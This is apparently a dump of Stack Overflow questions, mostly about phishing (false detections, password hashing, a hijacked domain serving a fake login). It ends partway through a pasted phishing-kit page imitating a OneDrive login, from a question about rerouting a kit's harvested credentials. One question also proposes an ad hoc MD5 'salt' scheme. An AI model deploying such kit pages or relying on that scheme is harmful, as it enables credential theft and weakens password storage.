  INFO 2013-05-07 12:14:19,142 server.py:561] default: "GET /query? url=abc.com&amp;amp;submit=Scan HTTP/1.1" 500 -
  INFO 2013-05-07 12:16:01,857 server.py:561] default: "GET / HTTP/1.1" 200 1236
  INFO 2013-05-07 12:16:01,894 server.py:561] default: "GET /images/logo.png HTTP/1.1" 304 -
  INFO 2013-05-07 12:16:01,898 server.py:561] default: "GET /css/cssscript.css HTTP/1.1" 304 -
  INFO 2013-05-07 12:16:01,943 server.py:561] default: "GET /images/left.png HTTP/1.1" 304 -
  INFO 2013-05-07 12:16:01,950 server.py:561] default: "GET /images/right.png HTTP/1.1" 304 -
  INFO 2013-05-07 12:16:01,950 server.py:561] default: "GET /images/bg.png HTTP/1.1" 304 -
  INFO 2013-05-07 12:16:02,065 server.py:561] default: "GET /favicon.ico HTTP/1.1" 404 154
  WARNING 2013-05-07 12:16:10,082 urlfetch_stub.py:453] Stripped prohibited headers from URLFetch request: ['Content-Length', 'Host']
  INFO 2013-05-07 19:16:23,915 main.py:420] shivaniHAHOHJSJKDNVJNCMBVJDCVHJSHHHHEKLLOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
  INFO 2013-05-07 19:16:23,917 main.py:421] resource=http%3A%2F%2Fgoogle.com&amp;amp;scan=1&amp;amp;key=b99eeaddac6ef5cf62746beffd71f1e16708b6db6085de243f050e241c6c671f
  WARNING 2013-05-07 12:16:23,924 urlfetch_stub.py:453] Stripped prohibited headers from URLFetch request: ['Content-Length', 'Host']
  INFO 2013-05-07 19:16:33,023 main.py:432] 1111111111111111111111111111111111111111111111111
  INFO 2013-05-07 19:16:33,026 main.py:433] result
  ERROR 2013-05-07 19:16:33,028 webapp2.py:1528] invalid literal for int() with base 10: 'result'
  Traceback (most recent call last):
  File "C:\Program Files (x86)\Google\google_appengine\lib\webapp2-2.3\webapp2.py", line 1511, in __call__
  rv = self.handle_exception(request, response, e)
  File "C:\Program Files (x86)\Google\google_appengine\lib\webapp2-2.3\webapp2.py", line 1505, in __call__
  rv = self.router.dispatch(request, response)
  File "C:\Program Files (x86)\Google\google_appengine\lib\webapp2-2.3\webapp2.py", line 1253, in default_dispatcher
  return route.handler_adapter(request, response)
  File "C:\Program Files (x86)\Google\google_appengine\lib\webapp2-2.3\webapp2.py", line 1077, in __call__
  return handler.dispatch()
  File "C:\Program Files (x86)\Google\google_appengine\lib\webapp2-2.3\webapp2.py", line 547, in dispatch
  return self.handle_exception(e, self.app.debug)
  File "C:\Program Files (x86)\Google\google_appengine\lib\webapp2-2.3\webapp2.py", line 545, in dispatch
  return method(*args, **kwargs)
  File "C:\Users\Shivani\Desktop\malbee-phish (1)\main.py", line 434, in get
  logging.info(data[int('result')])
 ValueError: invalid literal for int() with base 10: 'result'
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;what can be the possible reason..?? if i try data['result'] without int() it gives me following error
  TypeError: list indices must be integers, not str&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google-app-engine&gt;&lt;python-2.7&gt;</t>
  </si>
  <si>
    <t>Cryptography: Make a stronger hash for password</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm developing a system based on web and a client application; where the client make all the database queries in the server with the help of PHP and Http requests. The web system is developed in PHP / Mysql and the client application installed on the PC is developed in C#.&lt;/p&gt;
 &lt;p&gt;Good! in one phase, the client has to identify users through a login, this looks like a simple task BUT the server IP can be changed with the application configuration section. Considering this, any evil person can make phishing by entering an evil server ip address and then stealing passwords, the thing is, I will not send the password from the client in text/plain.&lt;/p&gt;
 &lt;p&gt;Right now I'm using md5 for password hashing (without salt, just the pure hash) and I'm using this only for store the password on the database.&lt;/p&gt;
 &lt;p&gt;After reading a bit, I realized that people doesn't recommend using md5 anymore, and use sha256 or above instead, I'm thinking of migrate to a better hashing algorithm and create my own salt.&lt;/p&gt;
 &lt;p&gt;As far as I know a salt is just a random piece of text you add to the hash, but I don't think it's the best option, so I was thinking on something:&lt;/p&gt;
 &lt;p&gt;Since hashes are based on hex values in lowercase with a fixed length (32, 64, etc.. depending of the algorithm), I can play with each ASCII code of each char of the hash with a sum of a fixed value loaded in a list (array) ex:&lt;/p&gt;
 &lt;p&gt;I have: abcd&lt;/p&gt;
 &lt;p&gt;ASCII code for each letter:&lt;/p&gt;
 &lt;p&gt;a -&gt; 97&lt;/p&gt;
 &lt;p&gt;b -&gt; 98&lt;/p&gt;
 &lt;p&gt;c -&gt; 99&lt;/p&gt;
 &lt;p&gt;d -&gt; 100&lt;/p&gt;
 &lt;p&gt;And then I sum a fixed value of the list (with a length of 32 / 64 integers depending) like this&lt;/p&gt;
 &lt;p&gt;a -&gt; 97 + 5 = 102 =&gt; f&lt;/p&gt;
 &lt;p&gt;b -&gt; 98 + 2 = 100 =&gt; d&lt;/p&gt;
 &lt;p&gt;c -&gt; 99 + 7 = 106 =&gt; j&lt;/p&gt;
 &lt;p&gt;d -&gt; 100 + 3 = 103 =&gt; g&lt;/p&gt;
 &lt;p&gt;So the result would be: fdje which replaces the hashing of abcd.&lt;/p&gt;
 &lt;p&gt;I don't know how safe could it be, and how difficult is for the hacker to determinate the technique I use, the thing is that the result has the same length as the hash, and is harder to determinate a salt, so if FOR ANY REASON IN THE HISTORY, hacker uses a rainbow table and catches a probable result, it WILL BE THE WRONG. What do you think about it?&lt;/p&gt;
 &lt;p&gt;Thank you...&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;hash&gt;&lt;passwords&gt;&lt;cryptography&gt;&lt;system&gt;</t>
  </si>
  <si>
    <t>Get detailed report Why website is detected as phishing attempt</t>
  </si>
  <si>
    <t>&lt;p&gt;One of the apps that I'm working on recently received phishing detection by BitDefender service. I wonder, what may the cause such a scenario?&lt;/p&gt;
 &lt;p&gt;It uses up to date version of the WordPress.&lt;/p&gt;
 &lt;p&gt;Here is the report:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://www.virustotal.com/#/url/7399557ed6efe17e14c6248740d1a17094ec87b63646123b56a148a9ae1e353c/detection" rel="nofollow noreferrer"&gt;https://www.virustotal.com/#/url/7399557ed6efe17e14c6248740d1a17094ec87b63646123b56a148a9ae1e353c/detection&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I've already written to BitDefender for an extra explanation but didn't receive any info yet.&lt;/p&gt;
 &lt;p&gt;This site tells me that from their perspective something is not OK:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://zulu.zscaler.com/submission/e9aa7749-b684-467a-be17-fe874eaf6514" rel="nofollow noreferrer"&gt;https://zulu.zscaler.com/submission/e9aa7749-b684-467a-be17-fe874eaf6514&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Could that be the 302 redirect from non-secure to secure version of the website that causes the issue? Should I switch to 301 instead?&lt;/p&gt;
 &lt;p&gt;Thanks in advance for any clue.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wordpress&gt;&lt;devops&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How does wifi password work against phishing attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a my_wifi_access_point setup and it's password protected. My phone is connected to the wifi using the password I set. This is a typical home wifi scenario.&lt;/p&gt;
 &lt;p&gt;What if a malicious user comes along and also setup a wifi with the same ssid near my phone, and lure my phone connecting to it. That way it can get the password from my phone and later use it to access my_wifi_access_point. How does wifi work to prevent this from happening?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;wifi&gt;&lt;ssid&gt;</t>
  </si>
  <si>
    <t>Email sent from web server causes gmail to treat as phishing. How to get rid of this?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am sending account activation email from my .net app.&lt;/p&gt;
 &lt;p&gt;I set the from address to "xyz.support@gmail.com" and from name "xyz" where xyz is the name of the domain i.e. our website.&lt;/p&gt;
 &lt;p&gt;It was not a problem when we were using Google's SMTP server as I provided credentials to google during sending. But now I am using my own web server's SMTP to send the email.&lt;/p&gt;
 &lt;p&gt;When I view the activation email in gmail, I get this:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;This message may not have been sent by: xyz.support@gmail.com Learn more Report phishing&lt;/strong&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Is there a way to get rid of this so that gmail and other client don't show this message?&lt;/p&gt;
 &lt;p&gt;Here is the code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;var smtpClient = new SmtpClient();
 var message = new MailMessage();
 smtpClient.Host = _config.SMTPServer;
 message.From = new MailAddress("xyz.support@gmail.com", "xyz");
 message.To.Add("newuser@gmail.com"); 
 message.IsBodyHtml = true;
 message.Subject = "Test subject";
 message.Body = "Test Body";
 smtpClient.Send(message);
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Thanks&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;asp.net&gt;&lt;email&gt;&lt;gmail&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Firebase Storage Security Error - Incorrectly flagged as phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm working on this React, Redux, Google Auth, Firebase / Firestore app. I'm fairly new to React, so I basically just modified code I made from doing a clone of a social site tutorial from YouTube.&lt;/p&gt;
 &lt;p&gt;Everything worked fine on my tutorial project and I never got any of these warnings even after deploying or testing online.&lt;/p&gt;
 &lt;p&gt;I started modifying the code for my new use case which is basically a simple CRUD tool for my business. Just some input fields, with the ability to upload up to 2 files to firebase storage and then display those uploaded documents in iframes alongside the other values from inputs. I got a basic implementation working and I wanted to show my partner. After I deployed the site to firebase, I logged into the app on our custom domain and everything was fine. I created a couple dummy documents with the app and in the middle of creation of the second document / upload, the screen goes red with a:&lt;/p&gt;
 &lt;p&gt;!DANGEROUS Deceptive Site Ahead WARNING! - Attackers on &lt;strong&gt;firebasestorage.googleapis.com&lt;/strong&gt; may trick you into doing something dangerous like installing software or revealing your personal information.&lt;/p&gt;
 &lt;p&gt;I was really surprised by this. I clicked ignore, and everything was working properly. The strange thing is, this same &amp;quot;Dangerous!&amp;quot; Security Warning started occurring simultaneously on my localhost server that was the same as the deployed version but had never generated these warnings previously.&lt;/p&gt;
 &lt;p&gt;I've tried finding &lt;em&gt;relevant&lt;/em&gt; info on what could be causing this but have not been successful.&lt;/p&gt;
 &lt;p&gt;I didn't know what else to do, so I started &amp;quot;reporting a detection problem&amp;quot; with requests for any kind of guidance in troubleshooting this issue. I also reached out to firebase support who once they finally got back to me, basically said this issue was &amp;quot;out of scope&amp;quot; as it was an issue with Chrome - although this warning is occurring on other browsers.&lt;/p&gt;
 &lt;p&gt;I didn't know what I was going to do. I couldn't figure out what direction to go in to resolve this issue, &lt;strong&gt;and then without me modifying anything the warnings just went away&lt;/strong&gt;. And they stopped showing up for 3 days. I thought, it must have just been some type of automatic security feature that flags new firebase apps with certain types of functionality until they can be analyzed as non-malicious or something along those lines. Confused but relieved I continued working.&lt;/p&gt;
 &lt;p&gt;And then while creating a test document several days later, the screen went red again and the same security warning appeared and persists. This warning only appears after logging in via google auth and being redirected to an authenticated section of the app.&lt;/p&gt;
 &lt;p&gt;Does anyone know what could be causing this?&lt;/p&gt;
 &lt;p&gt;Any advice or troubleshooting tips are greatly appreciated!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;reactjs&gt;&lt;firebase&gt;&lt;google-cloud-firestore&gt;&lt;firebase-storage&gt;</t>
  </si>
  <si>
    <t>How to tackle Expo app rejected for malware (phishing)</t>
  </si>
  <si>
    <t>&lt;p&gt;I tried to publish an Expo app to the play store and it got rejected for &lt;code&gt;malware&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;Google says that:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;your app, xxx , currently contains phishing code that pretends to come
 from a trustworthy source, requests a user's authentication
 credentials or billing information, and sends the data to a
 third-party. This category also applies to code that intercepts the
 transmission of user credentials in transit&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I don't have any phishing code that I know of. There's a regular login/signup that interacts with my backend API hosted on Heroku. Payment is made via USSD.&lt;/p&gt;
 &lt;p&gt;Virus Total says that it's all good: &lt;a href="https://www.virustotal.com/gui/file/8b057d46b2d59bb0ec3df44d47b701a6b911cba230d80ab67d871e535c06e9f6/details" rel="nofollow noreferrer"&gt;https://www.virustotal.com/gui/file/8b057d46b2d59bb0ec3df44d47b701a6b911cba230d80ab67d871e535c06e9f6/details&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Any pointers on how I can start tackling this issue?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;expo&gt;&lt;google-play&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>My domain is being used to serve a phishing site. They have used used Apache redirection I think. Could somebody rescue me?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received email from Google search console saying my website contains social engineering contents. Sample URL is,&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://www.sanenthusiast.com/~stechies/Blessin/ba/index.php" rel="nofollow noreferrer"&gt;http://www.sanenthusiast.com/~stechies/Blessin/ba/index.php&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Safety tip &lt;strong&gt;For your own safety do not type anything in the page.&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Somebody hosted a mockup site of Google drive login page on these links. How to get rid of this? I have thoroughly checked my webserver an I dont see any of these folders or files. Looks likes &lt;code&gt;~stechies/&lt;/code&gt; could be some other webserver and I guess using Apache they have pointed &lt;code&gt;~stechies/Blessin/ba/index.php&lt;/code&gt; and &lt;code&gt;~stechies/Blessin/ba/&lt;/code&gt; to my webserver &lt;code&gt;sanenthusiast.com/&lt;/code&gt;?&lt;/p&gt;
 &lt;p&gt;Is this correct? It will be of great help if someone could help to stop this redirection. &lt;/p&gt;
 &lt;p&gt;I checked who owns stechies and found &lt;a href="https://www.stechies.com/" rel="nofollow noreferrer"&gt;https://www.stechies.com/&lt;/a&gt; Are they behind this phishing scam? Or possibly someone else has hacked them? &lt;/p&gt;
 &lt;p&gt;Edit:
 Another user in stackoverflow posted similar issue on his site - &lt;a href="https://stackoverflow.com/questions/41576266/someone-put-malicious-code-with-on-my-website/41587500#41587500"&gt;Someone put malicious code with &amp;quot;~&amp;quot; on my website&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;apache&gt;&lt;.htaccess&gt;&lt;url-routing&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Android - What data structure to store video subtitles to get them in O(1) time</t>
  </si>
  <si>
    <t>&lt;p&gt;I am playing a video in my application and I have to show subtitles on top of that. subtitles are in a separate smi file which is some sort of XML markup that provides subtitle information. the subtitle file looks something like this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;.
 .
 .
 &amp;lt;sync start=104600&amp;gt;
  &amp;lt;P Class=GBR&amp;gt;&amp;lt;i&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;span ID=style1_0&amp;gt;&amp;lt;i&amp;gt;Born of cold and winter air&amp;lt;/i&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;&amp;lt;i&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;span ID=style1_0&amp;gt;&amp;lt;i&amp;gt;and mountain rain combining.&amp;lt;/i&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;/P&amp;gt;
  &amp;lt;/sync&amp;gt;
  &amp;lt;sync start=107080&amp;gt;
  &amp;lt;P Class=MYS&amp;gt;&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;/P&amp;gt;
  &amp;lt;/sync&amp;gt;
  &amp;lt;sync start=107200&amp;gt;
  &amp;lt;P Class=MYS&amp;gt;&amp;lt;i&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;span ID=style2_0&amp;gt;&amp;lt;i&amp;gt;...serta hujan di pergunungan.&amp;lt;/i&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;/P&amp;gt;
  &amp;lt;/sync&amp;gt;
  &amp;lt;sync start=110840&amp;gt;
  &amp;lt;P Class=MYS&amp;gt;&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;/P&amp;gt;
  &amp;lt;P Class=GBR&amp;gt;&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;/P&amp;gt;
  &amp;lt;/sync&amp;gt;
  &amp;lt;sync start=111160&amp;gt;
  &amp;lt;P Class=SIM&amp;gt;&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;/P&amp;gt;
  &amp;lt;/sync&amp;gt;
  &amp;lt;sync start=111480&amp;gt;
  &amp;lt;P Class=GBR&amp;gt;&amp;lt;i&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;span ID=style1_0&amp;gt;&amp;lt;i&amp;gt;This icy force&amp;lt;/i&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;&amp;lt;i&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;span ID=style1_0&amp;gt;&amp;lt;i&amp;gt;both foul and fair...&amp;lt;/i&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;/P&amp;gt;
  &amp;lt;/sync&amp;gt;
 .
 .
 .
 .
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;the &lt;code&gt;start&lt;/code&gt; is the time in milliseconds when to show the subtitle on top of the video. Now I am parsing the using regex and creating a &lt;code&gt;ArrayList&lt;/code&gt; of &lt;code&gt;SubtitleChunk&lt;/code&gt; which contains the startTime and content associated with it.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;class SubtitleChunk {
  long startTime;
  String content;
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Now while showing the video I have started a separate thread which I am using get the subtitle from array and show it. Following is the logic&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;public void run() {
  while (!isFinished_) {
  if (subtitleContent != null &amp;amp;&amp;amp; subtitleContent.content_ != null) {
  for (int i = 0; i &amp;lt; length; i++) {
  SubtitleChunk subChunk1 = null;
  SubtitleChunk subChunk2 = null;
  try {
  subChunk1 = subtitleContent.content_.get(i);
  subChunk2 = subtitleContent.content_.get(i + 1);
  long cTime = moviePlayer_.getCurrentTimeMillis();
  if (cTime &amp;gt; subChunk1.startTime &amp;amp;&amp;amp; (subChunk2 == null || cTime &amp;lt; subChunk2.startTime)) {
  currentSub = subChunk1.content;
  currentChunk = subChunk1;
  break;
  }
  } catch (Exception e) {
  DebugUtil.printLogException(VIEW_LOG_TAG, e);
  currentSub = "";
  }
  }
  } else {
  currentSub = "";
  }
  } catch (InterruptedException e) {
  e.printStackTrace();
  } catch (Exception e) {
  e.printStackTrace();
  }
  new Handler(Looper.getMainLooper()).post(new Runnable() {
  public void run() {
  if (moviePlayer_.isPlaying()) {
  subtitleTextView.setText(Html.fromHtml(currentSub));
  } else {
  }
  }
  });
  }
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;As you can see, I am running a loop on the ArrayList and comparing the time of the subtitles with the &lt;code&gt;moviePlayer_.getCurrentTimeMillis()&lt;/code&gt; which I feel is too expensive. and subtitles are lagging and not in sync with the video.&lt;/p&gt;
 &lt;p&gt;All above was the explaination of the issue. and Now the question.. How can I improve it? to get the Subtitle for a specific time in O(1) time. &lt;/p&gt;
 &lt;h1&gt;EDITED&lt;/h1&gt;
 &lt;p&gt;I went with Interval Trees, thats what I needed to put the subtitles in: I got it from here: &lt;a href="https://github.com/phishman3579/java-algorithms-implementation" rel="nofollow"&gt;https://github.com/phishman3579/java-algorithms-implementation&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;android&gt;&lt;dictionary&gt;&lt;arraylist&gt;&lt;hashmap&gt;&lt;android-mediaplayer&gt;</t>
  </si>
  <si>
    <t>How to find out a possible man-in-the-middle the Google way?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am wondering how is Google able to show messages like &lt;code&gt;Cannot connect to the real mail.google.com&lt;/code&gt; or similar? Are the IP addresses of Google servers simply hard-coded within Chrome or is it possible to do a similar thing? This could help making sure clients are not visiting phishing or scams websites.&lt;/p&gt;
 &lt;p&gt;This errors only shows when trying to access Google related websites, nothing else.&lt;/p&gt;
 &lt;p&gt;Here is a sample of what Google Chrome shows when trying to connect to Gmail without providing the proxy credentials.&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/VEIFT.png" alt="enter image description here"&gt;&lt;/p&gt;
 &lt;p&gt;PS: I usually use C# &amp;amp; ASP.NET. I am open to suggestions.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;EDIT :&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Following the answer from SilverlightFox, is there any way to "request" the pinning of my website certificate? And/Or how to add it to the "STS preloaded list"?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;c#&gt;&lt;security&gt;&lt;ssl&gt;&lt;man-in-the-middle&gt;</t>
  </si>
  <si>
    <t>Is it a bad idea to have a login dialog inside an iframe?</t>
  </si>
  <si>
    <t>&lt;p&gt;We're creating a website where we will be giving out code snippets to our users which they can place on their own websites. These snippets contain a link a javascript include. When clicking the link, an iframe containing the login dialog to our site opens. The user then authenticates inside the iframe, does his work and when he leaves the iframe his session is closed. We've got it working allready and it's very slick.&lt;/p&gt;
 &lt;p&gt;Our main concern though is phishing. The user has absolutely now way of veryifying where the login page is really coming from. On the other hand, phising attacks are also succesfull even if the user can see the fake-url in the address bar. &lt;/p&gt;
 &lt;p&gt;Would you enter your (OpenId) credentials in an iframe? Does anyone know a pattern with which we could minimise the chances of a phishing attack? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;iframe&gt;</t>
  </si>
  <si>
    <t>Does disabling the "Allow from Unknown Sources" Option in the Android settings prevent automatic malware download/installation?</t>
  </si>
  <si>
    <t>&lt;p&gt;So the other day I was thinking about app distribution and I came across this setting in the Android settings &amp;quot;Allow Unknown sources&amp;quot;. I have read a few articles about it, but none seem to discuss how secure this feature exactly is.&lt;/p&gt;
 &lt;p&gt;I was wondering if disabling this option (let's say for every listed app) can prevent the automatic download and installation of malicious software from phishing links.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;android&gt;&lt;security&gt;&lt;malware&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Glyphish Icons display in jQuery Mobile</t>
  </si>
  <si>
    <t>&lt;p&gt;To start let me just say that I am new to jQuery as well as jQuery Mobile.&lt;/p&gt;
 &lt;p&gt;I'm using the following CSS in the header.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;.nav-glyphish-example .ui-btn .ui-btn-inner {
 padding-top: 40px !important;
 }
 .nav-glyphish-example .ui-btn .ui-icon {
 width: 30px!important;
 height: 30px!important;
 margin-left: -15px !important;
 box-shadow: none!important;
 -moz-box-shadow: none!important;
 -webkit-box-shadow: none!important;
 -webkit-border-radius: none !important;
 border-radius: none !important;
 }
 #feeling .ui-icon {
 background: url(content/glyphish-icons/home.png) 50% 50% no-repeat;
 background-size: 22px 22px;
 }
 #review .ui-icon {
 background: url(content/glyphish-icons/review.png) 50% 50% no-repeat;
 background-size: 22px 22px;
 }
 #media .ui-icon {
 background: url(content/glyphish-icons/media.png) 50% 50% no-repeat;
 background-size: 18px 23px;
 }
 #settings .ui-icon {
 background: url(content/glyphish-icons/settings.png) 50% 50% no-repeat;
 background-size: 20px 22px;
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I'm using the glyphish icons in a jQuery Mobile project using the following code for a navbar:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;div data-role="header"&amp;gt;
  &amp;lt;div data-role="navbar" class="nav-glyphish-example" data-theme="e" data-grid="c"&amp;gt;
  &amp;lt;ul&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a href="#feeling" id="feeling" data-icon="custom" data-iconpos="top" data-theme="b"&amp;gt;&amp;lt;small&amp;gt;Record&amp;lt;/small&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a href="#media" id="media" data-icon="custom" data-iconpos="top" data-theme="b"&amp;gt;&amp;lt;small&amp;gt;Relax&amp;lt;/small&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a href="#review" id="review" data-icon="custom" data-iconpos="top" data-theme="b"&amp;gt;&amp;lt;small&amp;gt;Review&amp;lt;/small&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a href="#settings" id="settings" data-icon="custom" data-iconpos="top" data-theme="b"&amp;gt;&amp;lt;small&amp;gt;Settings&amp;lt;/small&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The project has about 8 total pages in one index.html page with some pages linked from navbars in the header. &lt;/p&gt;
 &lt;p&gt;When I visit the start page the navbar looks fine. However, once I visit one of the pages linked from the navbar all the icons change to the icon for that page. Some of these pages have buttons in the content div linked to additonal pages. If I click any of the linked buttons from the content div the icons in the navbar reset to the correct ones. &lt;/p&gt;
 &lt;p&gt;I'd really appreciate some insight into this. My first thought was that that a refresh is needed on the page since a click on a content div link sets the icon set back to its proper display. Does that sound right?&lt;/p&gt;
 &lt;p&gt;Another strange behavior is that when I take the CSS and put it in a file that I call none of the icons display.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;jquery&gt;&lt;icons&gt;&lt;refresh&gt;</t>
  </si>
  <si>
    <t>Why am I not receiving emails with the credentials inputted into my locally hosted (non-illegal) phishing site?</t>
  </si>
  <si>
    <t>&lt;p&gt;Don't worry it's not what it sounds like. I'm doing a project which involves interacting with Phishing sites with Puppeteer.&lt;/p&gt;
 &lt;p&gt;In order to test my code I downloaded dozens of phishing kits using (&lt;a href="https://github.com/cybercdh/phishfinder" rel="nofollow noreferrer"&gt;https://github.com/cybercdh/phishfinder&lt;/a&gt;).&lt;/p&gt;
 &lt;p&gt;I've locally hosted some of these phishing sites, simply by unpacking the phishing kits into my ubuntu VM's /var/www/&lt;/p&gt;
 &lt;p&gt;The thing is, I was hoping to test my code by changing the phishers email to my own throwaway email. I did this, put some false credentials into the phishing site, and sadly received no email.&lt;/p&gt;
 &lt;p&gt;To be specific, most of the phishing kits contain a .php file with the phishers email address in it. All I've done is swap that for my own.&lt;/p&gt;
 &lt;p&gt;Does anyone know what I'm doing wrong? What else do I have to edit other than the phishers email address?&lt;/p&gt;
 &lt;p&gt;As requested, here is the code.&lt;/p&gt;
 &lt;p&gt;index.html:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;!doctype html&amp;gt;
 &amp;lt;html lang=&amp;quot;en&amp;quot;&amp;gt;
 &amp;lt;head&amp;gt;
  &amp;lt;script src=&amp;quot;https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script src=&amp;quot;https://code.jquery.com/jquery-3.1.1.min.js&amp;quot;&amp;gt;
  &amp;lt;script src=&amp;quot;https://code.jquery.com/jquery-3.3.1.js&amp;quot; integrity=&amp;quot;sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=&amp;quot; crossorigin=&amp;quot;anonymous&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;!-- Required meta tags --&amp;gt;
  &amp;lt;meta charset=&amp;quot;utf-8&amp;quot;&amp;gt;
  &amp;lt;meta name=&amp;quot;viewport&amp;quot; content=&amp;quot;width=device-width, initial-scale=1, shrink-to-fit=no&amp;quot;&amp;gt;
  &amp;lt;!-- Bootstrap CSS --&amp;gt;
  &amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css&amp;quot; integrity=&amp;quot;sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm&amp;quot; crossorigin=&amp;quot;anonymous&amp;quot;&amp;gt;
  &amp;lt;link href=&amp;quot;https://fonts.googleapis.com/css?family=Archivo+Narrow&amp;amp;display=swap&amp;quot; rel=&amp;quot;stylesheet&amp;quot;&amp;gt;
  &amp;lt;script src=&amp;quot;https://kit.fontawesome.com/585b051251.js&amp;quot; crossorigin=&amp;quot;anonymous&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;title&amp;gt;OneDrive | Login&amp;lt;/title&amp;gt;
  &amp;lt;link rel=&amp;quot;icon&amp;quot; type=&amp;quot;image/png&amp;quot; sizes=&amp;quot;100x100&amp;quot; href=&amp;quot;images/onedrive-white.png&amp;quot;&amp;gt;
  &amp;lt;link href=&amp;quot;css/hover.css&amp;quot; rel=&amp;quot;stylesheet&amp;quot; media=&amp;quot;all&amp;quot;&amp;gt;
  &amp;lt;link href=&amp;quot;css/album.css&amp;quot; rel=&amp;quot;stylesheet&amp;quot;&amp;gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;
  html, body {
  height: 100%;
  }
  &amp;lt;/style&amp;gt;
  &amp;lt;/head&amp;gt;
  &amp;lt;body&amp;gt;
  &amp;lt;!-- videooo div start//////////// --&amp;gt;
  &amp;lt;div class=&amp;quot;main-video-wrapper&amp;quot; style=&amp;quot;filter: blur(8px);
  -webkit-filter: blur(8px);background-color:rgba(0,0,0,0.7);&amp;quot;&amp;gt;
